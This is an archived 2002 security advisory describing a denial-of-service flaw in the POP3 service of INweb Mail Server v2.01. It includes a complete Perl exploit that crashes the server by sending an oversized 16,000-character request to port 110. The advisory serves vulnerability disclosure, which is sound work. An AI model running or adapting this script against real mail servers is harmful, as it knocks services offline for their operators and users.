exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

INwebMailServer.txt

INwebMailServer.txt
Posted Nov 13, 2002
Authored by Tamer Sahin | Site securityoffice.net

A memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3 server included with INweb Mail Server does not properly handle some types of requests. By submitting a maliciously crafted request to the POP3 server, an attacker could crash the system, resulting in a denial of service.

tags | exploit, denial of service
SHA-256 | 1c82afe19efc5cd1f9b94c6e761931142f3ae2f1c1916669da77662486122d4e

INwebMailServer.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ INweb Mail Server v2.01 Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

November 12, 2002

- --[ Product / Vendor

The INweb Mail Server is a standard Internet POP3 and SMTP mail server that
runs flawlessly under Windows 2000 and NT and other windows platforms.
The INweb Mail Server provides numerous unique features for both small and
large businesses as well as ISP's. This includes many facilities to handle spam
and viruses.

http://www.inwebmail.com

- --[ Summary

Memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3
server included with INweb Mail Server does not properly handle some types
of requests. By submitting a maliciously crafted request to the POP3 server,
an attacker could crash the system, resulting in a denial of service.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

==================== SNIP ====================

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = "110";
$evil = "A" x 16000;

print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";

print "Attacking...\n";
print $socket "helo:$evil\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

==================== SNIP ====================

- --[ Tested

INweb Mail Server v2.01 / Windows 2000 sp3

- --[ Vulnerable

INweb Mail Server v2.01 / Windows 2000 sp3

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use
of any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback@securityoffice.net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this
Security Advisory is not modified in any way and is attributed to SecurityOffice
and provided that such reproduction and distribution is performed for
non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPdEmHPpL5ibJRTtBAQHvDAf/YO13r8TkwFMuYEXgdHxaTmRtkUGn1CX2
3biZlvU/9XU6Y36S3tPzVVQiQuhMcNJ3EyRMVHi5OcanrT6uOrp0jQExh5SRMPH/
Y4wPN0Pm+f7gLLxAjp1uuvKR/NwaMTkgklrxAyM3Ek/kqS4Vh4t87d/nohAzOKa2
nLoK2P39ngwTRF/Sg04xsAXDLd7/RQ/cC7z7I/DbFPa17OYBUhciw/+wYKe+bo4u
FvXXPhcQnq8g8EJWfq1qHbEMYdXJrmhRudzIyVWQBSuw9+jX5qjvfh/09ZqS1I+Q
Vvk556SO9/NF+mgMose0YZ/76Ck5ippZjgKzpppud1JfljV3D+YyiA==
=z6ly
-----END PGP SIGNATURE-----



Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close